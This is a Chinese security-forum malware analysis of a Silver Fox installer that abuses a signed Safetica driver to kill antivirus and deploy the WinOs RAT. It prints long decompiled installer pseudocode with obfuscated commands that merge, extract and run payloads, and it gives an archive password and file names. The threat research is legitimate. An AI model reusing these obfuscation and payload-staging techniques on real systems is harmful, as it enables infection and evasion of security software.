好友 阅读权限 35
听众 最后登录 1970-1-1
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
本帖最后由 ahov 于 2026-2-12 17:43 编辑 持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
一、背景
在日常样本狩猎中,我们发现捕获的一枚银狐样本 尝试加载了先前未曾出现过的可疑驱动STProcessMonitor Driver,最终加载WinOs远控程序操控用户计算机。
该驱动通过了WHQL认证,具有"Safetica Technologies s.r.o."与"Microsoft Windows Hardware Compatibility Publisher"颁发的数字签名,签名时间为2025年5月9日 11:43:46,相当新鲜。
经过分析,该STProcessMonitor Driver在没有经过目标验证的情况下,将结束进程功能的IOCTL暴露给用户模式。该漏洞使攻击者能够终止内核模式中的任意进程,通过BYOVD KillAV。
进一步溯源,我们发现,该批银狐行为者多次组合使用多种脆弱驱动干扰防病毒软件,肆意操纵用户计算机,并最终加载WinOs远控载荷,将用户计算机变为可以被黑客控制的“肉鸡”,先前已多次被国内安全厂商发现并分析,可参考:"银狐"新进展:多Rootkit配合,内核InfinityHook+穿透读写 》连用四个驱动!银狐开始硬刚EDR和杀软 | 银狐十月总结 》magicsword-io/LOLDrivers 仓库提交后,会在合适的时机Apply for publication)。这也表明该批银狐行为者可能会在真实世界中主动搜寻和挖掘全新的漏洞驱动。
样本执行流程图请参考如下:
本文思维导图请参考如下(按照复杂梯度排序):
二、样本分析
A.) Setup
SHA-256: 3ba89047b9fb9ae2281e06a7f10a407698174b201f28fc1cadb930207254e485
第一步,提取安装程序内的应用文件和安装程序内嵌文件
(2) 我们观察到安装程序内嵌文件CompiledCode.bin,这是一个编译后的IFPS脚本,如下图所示:
我们在该类汇编伪代码中,观察到一个可疑函数"OBFUSCATEDEXTRACT",函数原文如下:
.function(export) void OBFUSCATEDEXTRACT()
pushtype S32 ; StackCount = 1
pushtype UnicodeString_2 ; StackCount = 2
pushtype UnicodeString_2 ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype UnicodeString_2 ; StackCount = 7
pushtype UnicodeString_2 ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype UnicodeString_2 ; StackCount = 10
pushtype UnicodeString_2 ; StackCount = 11
pushtype UnicodeString_2 ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(7)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(99)
assign Var15[1], S32(109)
assign Var15[2], S32(100)
assign Var15[3], S32(46)
assign Var15[4], S32(101)
assign Var15[5], S32(120)
assign Var15[6], S32(101)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var2 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(137)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(47)
assign Var15[1], S32(99)
assign Var15[2], S32(32)
assign Var15[3], S32(99)
assign Var15[4], S32(111)
assign Var15[5], S32(112)
assign Var15[6], S32(121)
assign Var15[7], S32(32)
assign Var15[8], S32(47)
assign Var15[9], S32(98)
assign Var15[10], S32(32)
assign Var15[11], S32(47)
assign Var15[12], S32(121)
assign Var15[13], S32(32)
assign Var15[14], S32(34)
assign Var15[15], S32(67)
assign Var15[16], S32(58)
assign Var15[17], S32(92)
assign Var15[18], S32(85)
assign Var15[19], S32(115)
assign Var15[20], S32(101)
assign Var15[21], S32(114)
assign Var15[22], S32(115)
assign Var15[23], S32(92)
assign Var15[24], S32(80)
assign Var15[25], S32(117)
assign Var15[26], S32(98)
assign Var15[27], S32(108)
assign Var15[28], S32(105)
assign Var15[29], S32(99)
assign Var15[30], S32(92)
assign Var15[31], S32(68)
assign Var15[32], S32(111)
assign Var15[33], S32(99)
assign Var15[34], S32(117)
assign Var15[35], S32(109)
assign Var15[36], S32(101)
assign Var15[37], S32(110)
assign Var15[38], S32(116)
assign Var15[39], S32(115)
assign Var15[40], S32(92)
assign Var15[41], S32(109)
assign Var15[42], S32(97)
assign Var15[43], S32(105)
assign Var15[44], S32(110)
assign Var15[45], S32(46)
assign Var15[46], S32(49)
assign Var15[47], S32(34)
assign Var15[48], S32(32)
assign Var15[49], S32(43)
assign Var15[50], S32(32)
assign Var15[51], S32(34)
assign Var15[52], S32(67)
assign Var15[53], S32(58)
assign Var15[54], S32(92)
assign Var15[55], S32(85)
assign Var15[56], S32(115)
assign Var15[57], S32(101)
assign Var15[58], S32(114)
assign Var15[59], S32(115)
assign Var15[60], S32(92)
assign Var15[61], S32(80)
assign Var15[62], S32(117)
assign Var15[63], S32(98)
assign Var15[64], S32(108)
assign Var15[65], S32(105)
assign Var15[66], S32(99)
assign Var15[67], S32(92)
assign Var15[68], S32(68)
assign Var15[69], S32(111)
assign Var15[70], S32(99)
assign Var15[71], S32(117)
assign Var15[72], S32(109)
assign Var15[73], S32(101)
assign Var15[74], S32(110)
assign Var15[75], S32(116)
assign Var15[76], S32(115)
assign Var15[77], S32(92)
assign Var15[78], S32(109)
assign Var15[79], S32(97)
assign Var15[80], S32(105)
assign Var15[81], S32(110)
assign Var15[82], S32(46)
assign Var15[83], S32(50)
assign Var15[84], S32(34)
assign Var15[85], S32(32)
assign Var15[86], S32(34)
assign Var15[87], S32(67)
assign Var15[88], S32(58)
assign Var15[89], S32(92)
assign Var15[90], S32(85)
assign Var15[91], S32(115)
assign Var15[92], S32(101)
assign Var15[93], S32(114)
assign Var15[94], S32(115)
assign Var15[95], S32(92)
assign Var15[96], S32(80)
assign Var15[97], S32(117)
assign Var15[98], S32(98)
assign Var15[99], S32(108)
assign Var15[100], S32(105)
assign Var15[101], S32(99)
assign Var15[102], S32(92)
assign Var15[103], S32(68)
assign Var15[104], S32(111)
assign Var15[105], S32(99)
assign Var15[106], S32(117)
assign Var15[107], S32(109)
assign Var15[108], S32(101)
assign Var15[109], S32(110)
assign Var15[110], S32(116)
assign Var15[111], S32(115)
assign Var15[112], S32(92)
assign Var15[113], S32(109)
assign Var15[114], S32(97)
assign Var15[115], S32(105)
assign Var15[116], S32(110)
assign Var15[117], S32(90)
assign Var15[118], S32(84)
assign Var15[119], S32(116)
assign Var15[120], S32(82)
assign Var15[121], S32(106)
assign Var15[122], S32(84)
assign Var15[123], S32(102)
assign Var15[124], S32(121)
assign Var15[125], S32(104)
assign Var15[126], S32(78)
assign Var15[127], S32(73)
assign Var15[128], S32(68)
assign Var15[129], S32(67)
assign Var15[130], S32(65)
assign Var15[131], S32(70)
assign Var15[132], S32(46)
assign Var15[133], S32(120)
assign Var15[134], S32(109)
assign Var15[135], S32(108)
assign Var15[136], S32(34)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var3 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype Pointer ; StackCount = 15
setptr Var15, Var1
pushtype U8_4 ; StackCount = 16
assign Var16, U8_4(1)
pushtype S32 ; StackCount = 17
assign Var17, S32(0)
pushtype UnicodeString_2 ; StackCount = 18
assign Var18, String_3("")
pushtype UnicodeString_2 ; StackCount = 19
assign Var19, Var3
pushtype UnicodeString_2 ; StackCount = 20
assign Var20, Var2
pushvar Var14 ; StackCount = 21
call EXEC
pop ; StackCount = 20
pop ; StackCount = 19
pop ; StackCount = 18
pop ; StackCount = 17
pop ; StackCount = 16
pop ; StackCount = 15
pop ; StackCount = 14
sfz Var14
pop ; StackCount = 13
jf loc_196d
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(25)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(67)
assign Var15[1], S32(58)
assign Var15[2], S32(92)
assign Var15[3], S32(85)
assign Var15[4], S32(115)
assign Var15[5], S32(101)
assign Var15[6], S32(114)
assign Var15[7], S32(115)
assign Var15[8], S32(92)
assign Var15[9], S32(80)
assign Var15[10], S32(117)
assign Var15[11], S32(98)
assign Var15[12], S32(108)
assign Var15[13], S32(105)
assign Var15[14], S32(99)
assign Var15[15], S32(92)
assign Var15[16], S32(68)
assign Var15[17], S32(111)
assign Var15[18], S32(99)
assign Var15[19], S32(117)
assign Var15[20], S32(109)
assign Var15[21], S32(101)
assign Var15[22], S32(110)
assign Var15[23], S32(116)
assign Var15[24], S32(115)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var4 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(7)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(92)
assign Var15[1], S32(109)
assign Var15[2], S32(97)
assign Var15[3], S32(105)
assign Var15[4], S32(110)
assign Var15[5], S32(46)
assign Var15[6], S32(49)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var7 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(7)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(92)
assign Var15[1], S32(109)
assign Var15[2], S32(97)
assign Var15[3], S32(105)
assign Var15[4], S32(110)
assign Var15[5], S32(46)
assign Var15[6], S32(50)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var8 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype WideString ; StackCount = 16
assign Var16, Var4
add Var16, Var7
assign Var15, Var16
pop ; StackCount = 15
pushvar Var14 ; StackCount = 16
call DELETEFILE
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype WideString ; StackCount = 16
assign Var16, Var4
add Var16, Var8
assign Var15, Var16
pop ; StackCount = 15
pushvar Var14 ; StackCount = 16
call DELETEFILE
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(11)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(92)
assign Var15[1], S32(102)
assign Var15[2], S32(117)
assign Var15[3], S32(110)
assign Var15[4], S32(122)
assign Var15[5], S32(105)
assign Var15[6], S32(112)
assign Var15[7], S32(46)
assign Var15[8], S32(101)
assign Var15[9], S32(120)
assign Var15[10], S32(101)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var5 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(24)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(92)
assign Var15[1], S32(109)
assign Var15[2], S32(97)
assign Var15[3], S32(105)
assign Var15[4], S32(110)
assign Var15[5], S32(90)
assign Var15[6], S32(84)
assign Var15[7], S32(116)
assign Var15[8], S32(82)
assign Var15[9], S32(106)
assign Var15[10], S32(84)
assign Var15[11], S32(102)
assign Var15[12], S32(121)
assign Var15[13], S32(104)
assign Var15[14], S32(78)
assign Var15[15], S32(73)
assign Var15[16], S32(68)
assign Var15[17], S32(67)
assign Var15[18], S32(65)
assign Var15[19], S32(70)
assign Var15[20], S32(46)
assign Var15[21], S32(120)
assign Var15[22], S32(109)
assign Var15[23], S32(108)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var6 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
assign Var14, Var4
add Var14, Var5
assign Var11, Var14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
assign Var14, Var4
add Var14, Var6
assign Var12, Var14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(10)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(104)
assign Var15[1], S32(116)
assign Var15[2], S32(76)
assign Var15[3], S32(99)
assign Var15[4], S32(69)
assign Var15[5], S32(78)
assign Var15[6], S32(121)
assign Var15[7], S32(82)
assign Var15[8], S32(70)
assign Var15[9], S32(89)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var9 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(10)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var15[0], S32(119)
assign Var15[1], S32(88)
assign Var15[2], S32(115)
assign Var15[3], S32(72)
assign Var15[4], S32(70)
assign Var15[5], S32(110)
assign Var15[6], S32(85)
assign Var15[7], S32(110)
assign Var15[8], S32(113)
assign Var15[9], S32(75)
assign Var14, Var15
pop ; StackCount = 14
pushvar Var10 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype WideString ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(7)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(120)
assign Var17[1], S32(32)
assign Var17[2], S32(45)
assign Var17[3], S32(121)
assign Var17[4], S32(32)
assign Var17[5], S32(45)
assign Var17[6], S32(112)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
add Var14, Var9
add Var14, Var10
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(4)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(32)
assign Var17[1], S32(45)
assign Var17[2], S32(111)
assign Var17[3], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
add Var14, Var4
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(3)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(34)
assign Var17[1], S32(32)
assign Var17[2], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
add Var14, Var12
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(1)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
assign Var15, Var11
pushvar Var14 ; StackCount = 16
call FILEEXISTS
pop ; StackCount = 15
pop ; StackCount = 14
jz loc_18bc, Var14
pushtype BOOLEAN ; StackCount = 15
pushtype UnicodeString_2 ; StackCount = 16
assign Var16, Var12
pushvar Var15 ; StackCount = 17
call FILEEXISTS
pop ; StackCount = 16
pop ; StackCount = 15
and Var14, Var15
pop ; StackCount = 14
loc_18bc:
sfz Var14
pop ; StackCount = 13
jf loc_196d
pushtype BOOLEAN ; StackCount = 14
pushtype Pointer ; StackCount = 15
setptr Var15, Var1
pushtype U8_4 ; StackCount = 16
assign Var16, U8_4(1)
pushtype S32 ; StackCount = 17
assign Var17, S32(0)
pushtype UnicodeString_2 ; StackCount = 18
assign Var18, String_3("")
pushtype UnicodeString_2 ; StackCount = 19
assign Var19, Var13
pushtype UnicodeString_2 ; StackCount = 20
assign Var20, Var11
pushvar Var14 ; StackCount = 21
call EXEC
pop ; StackCount = 20
pop ; StackCount = 19
pop ; StackCount = 18
pop ; StackCount = 17
pop ; StackCount = 16
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
pushtype BOOLEAN ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
assign Var15, Var12
pushvar Var14 ; StackCount = 16
call DELETEFILE
pop ; StackCount = 15
pop ; StackCount = 14
pop ; StackCount = 13
loc_196d:
ret其中,我们观察到大量ASCII码,例如在开头的[99, 109, 100, 46, 101, 120, 101]即对应cmd.exe:
assign Var15[0], S32(99) ; 'c'
assign Var15[1], S32(109) ; 'm'
assign Var15[2], S32(100) ; 'd'
assign Var15[3], S32(46) ; '.'
assign Var15[4], S32(101) ; 'e'
assign Var15[5], S32(120) ; 'x'
assign Var15[6], S32(101) ; 'e'在该函数中包含多个ASCII码数组,用于构建字符串并执行命令。字符串通过数组编码(如[67, 58, 92, ...]对应ASCII码,解码后为C:...),增加反分析难度。
以下是所有数组的ASCII码还原结果及其对应的字符串:
第一个数组(7字节)
第二个数组(137字节)
第三个数组(25字节)
第四个数组(7字节)
第五个数组(7字节)
第六个数组(11字节)
第七个数组(24字节)
第八个数组(10字节)
第九个数组(10字节)
第十个数组(7字节)
第十一个数组(4字节)
第十二个数组(3字节)
第十三个数组(1字节)
该函数依次执行以下功能:
执行cmd.exe /c copy /b /y,将C:\Users\Public\Documents\main.1和main.2合并为mainZTtRjTfyhNIDCAF.xml
删除main.1和main.2文件
检查funzip.exe和mainZTtRjTfyhNIDCAF.xml文件是否存在,如果存在则执行: funzip.exe x -y -p htLcENyRFYwXsHFnUnqK -o"C:\Users\Public\Documents" "C:\Users\Public\Documents\mainZTtRjTfyhNIDCAF.xml",解压mainZTtRjTfyhNIDCAF.xml文件
删除mainZTtRjTfyhNIDCAF.xml文件
于是我们得到mainZTtRjTfyhNIDCAF.xml文件解压密码为"htLcENyRFYwXsHFnUnqK",解压后可得到: men.exe man100.dat Server.log.
2) "YQMBPLIVKAXLBBKHOYPB"函数
我们在该类汇编伪代码中,观察到一个可疑函数"YQMBPLIVKAXLBBKHOYPB",函数原文如下:
.function(export) void YQMBPLIVKAXLBBKHOYPB()
pushtype BOOLEAN ; StackCount = 1
pushtype UnicodeString_2 ; StackCount = 2
pushtype UnicodeString_2 ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype S32 ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushvar Var8 ; StackCount = 9
call INITIALIZESETUP
pop ; StackCount = 8
pop ; StackCount = 7
pushvar Var1 ; StackCount = 8
call IS360PROCESSRUNNING
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
assign Var8, Var1
setz Var8
sfz Var8
pop ; StackCount = 7
jf loc_263f
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(1)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
assign Var12, String_3("")
pushtype UnicodeString_2 ; StackCount = 13
pushtype WideString ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(12)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(47)
assign Var17[1], S32(99)
assign Var17[2], S32(32)
assign Var17[3], S32(99)
assign Var17[4], S32(111)
assign Var17[5], S32(112)
assign Var17[6], S32(121)
assign Var17[7], S32(32)
assign Var17[8], S32(47)
assign Var17[9], S32(98)
assign Var17[10], S32(32)
assign Var17[11], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(13)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(51)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(43)
assign Var17[11], S32(32)
assign Var17[12], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(11)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(50)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(21)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(102)
assign Var17[2], S32(117)
assign Var17[3], S32(110)
assign Var17[4], S32(122)
assign Var17[5], S32(105)
assign Var17[6], S32(112)
assign Var17[7], S32(46)
assign Var17[8], S32(101)
assign Var17[9], S32(120)
assign Var17[10], S32(101)
assign Var17[11], S32(34)
assign Var17[12], S32(32)
assign Var17[13], S32(38)
assign Var17[14], S32(38)
assign Var17[15], S32(32)
assign Var17[16], S32(100)
assign Var17[17], S32(101)
assign Var17[18], S32(108)
assign Var17[19], S32(32)
assign Var17[20], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(11)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(51)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
